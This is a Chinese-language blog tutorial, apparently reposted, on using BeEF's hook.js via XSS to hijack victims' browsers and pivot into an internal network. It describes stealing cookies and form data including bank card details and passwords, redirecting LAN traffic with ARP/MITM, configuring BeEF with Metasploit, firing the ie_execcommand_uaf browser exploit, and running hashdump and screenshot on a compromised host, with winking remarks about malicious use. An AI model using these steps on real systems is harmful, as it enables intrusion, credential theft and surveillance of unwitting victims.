内网渗透一:利用Xss漏洞进入内网

0x01:科普

Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。

 0x02安装

Kali linux 系统默认未安装beef,需要自行安装。

?
1
2
apt-get update
apt-get install beef-xss

 

0x03入门

0x03.1启动

主目录:

/usr/share/beef-xss

?
1
2
cd /usr/share/beef-xss
./beef

 

t01287a4dec5cc49b91.png

t0178b9b1ea09d0e72b.png

127.0.0.1:3000/ui/pannel

账号密码

beef/beef

t01fac022bc1ad5e4aa.png

demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常:

t011e6491eb9aafbd00.png

访问Beef demo页面

t01dc43ebf9a8fb188b.png

demo页面嵌入了hook.js 访问->中招

0x04挂马:

在正常页面添加script标签,嵌入恶意脚本

 

加载中...

在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?

 

网站反馈页面,举报页面案例:用Xss平台沦陷百度投诉中心后台

 

当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。

Online Browersers->右击->Use As Proxy

http://p5.qhimg.com/t0107cb7746a23e6d35.jpg

再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本...(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)

t016bd52ff0f6e09d92.png

 通过浏览器,我们可以看到目标主机的很多信息:

浏览器信息:
名称
版本
Browser UA String
Browser Platform
Windows size
插件基本信息:
Flash
VBS脚本
Web Sock
Quick Time
...
Api信息
Cookie
操作系统信息
Date 时间日期
硬件信息
Cpu (32/64)
屏幕分辨率
是否支持触屏
 

And So On

用火狐浏览器测试

加载中...

t011909d221bef87b75.png

Beef功能模块组件

http://p6.qhimg.com/t013e83e9938073faa9.jpg

常用功能/模块

 

1 2 3 4 5 Browser:获取浏览器信息 --Hooked Domain -----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie; -----Get From Value 获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码; -----Redirect Browser 浏览器重定向

 

t011ca9c6d662701d53.jpg

执行后,目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面...(在这里露出一个淫荡的笑容)

Chrome Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host:获取受害者主机信息
Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social Enhineering:社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss

/config.yaml  

 

?
1
2
metasploit:
enable: false

改成 

?
1
2
metasploit:
enable: true
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# Copyright (c) 2006 - 2013 Wade Alcorn - wade @bindshell .net
# Browser Exploitation Framework (BeEF) - http: //beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
     version: '0.4.4.5-alpha'
     debug: false
     restrictions:
         # subnet of browser ip addresses that can hook to the framework
         permitted_hooking_subnet: "0.0.0.0/0"
         # subnet of browser ip addresses that can connect to the UI
         # permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
         # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
         # It's not advised to decrease it with tons of hooked browsers (more than 50 ),
         # because it might impact performance. Also, enable WebSockets is generally better.
         xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         # public : ""
         #public_port: "" # port setting is experimental
         # DNS
         dns_host: "localhost"
         dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
         # Allow one or multiple domains to access the RESTful API using CORS
         # For multiple domains use: "http://browserhacker.com, http://domain2.com"
         restful_api:
             allow_cors: false
             cors_allowed_domains: "http://browserhacker.com"
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
           secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second
         # Imitate a specified web server ( default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
             enable: true
             type: "apache" #supported: apache, iis
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
             # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
     database:
         # For information on using other databases please read the
         # README.databases file
         # supported DBs: sqlite, mysql, postgres
         # NOTE: you must change the Gemfile adding a gem require line like:
         #   gem "dm-postgres-adapter"
         # or
         #   gem "dm-mysql-adapter"
         # if you want to switch drivers from sqlite to postgres (or mysql).
         # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
         # db_file is only used for sqlite
         db_file: "db/beef.db"
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
         db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
         db_encoding: "UTF-8"
     # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
     credentials:
         user:   "beef"
         passwd: "beef"
     # Autorun modules as soon the browser is hooked.
     # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
     autorun:
         enable: true
         # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
         allow_user_notify: true
     crypto_default_value_length: 80
     # Enable client-side debugging
     client:
         debug: false
     # You may override default extension configuration parameters here
     extension:
         requester:
             enable: true
         proxy:
             enable: true
         metasploit:
             enable: true
         social_engineering:
             enable: true
         evasion:
             enable: false
         console:
              shell:
                 enable: false
         ipec:
             enable: true
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Copyright (c) 2006 - 2013 Wade Alcorn - wade @bindshell .net
# Browser Exploitation Framework (BeEF) - http: //beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost= 10.211 . 55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
     extension:
         metasploit:
             name: 'Metasploit'
             enable: true
             host: "172.16.244.129"
             port: 55552
             user: "msf"
             pass: "abc123"
             uri: '/api'
             ssl: false
             ssl_version: 'SSLv3'
             ssl_verify: true
             callback_host: "172.16.244.129"
             autopwn_url: "autopwn"
             auto_msfrpcd: false
             auto_msfrpcd_timeout: 120
             msf_path: [
               {os: 'osx' , path: '/opt/local/msf/' },
               {os: 'livecd' , path: '/opt/metasploit-framework/' },
               {os: 'bt5r3' , path: '/opt/metasploit/msf3/' },
               {os: 'bt5' , path: '/opt/framework3/msf3/' },
               {os: 'backbox' , path: '/opt/metasploit3/msf3/' },
               {os: 'win' , path: 'c:\\metasploit-framework\\' },
               {os: 'custom' , path: '/usr/share/metasploit-framework/' }
             ]

 

修改 host callback_host两参数,改为beef主机IP

重启postgresq、metasploit、服务

service postgresql restart & service metasploit restart

 

t019e7cd4b2aa99d854.jpg

msfconsole #启动Metasploit 1 load msgrpc ServerHost=172.16.244.129 Pass=abc123

 

t0169debf48fbc3942a.jpg

重启Beef

t0190d651f583e54f3b.jpg

启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台(莫名成了245 =。=!)

t01d5aa2f783869c7f9.jpg

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

t01418a1cdbd8c6e6a1.jpg

t01560b8713b2414391.jpg

 

靶机被强行跳转到被监听的URL

t0165e1ff04e684fc88.jpg

MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

t01fcc6b6cff8f19f8c.jpg

如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话

session -i 1

t01645e28238ba42595.jpg

screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值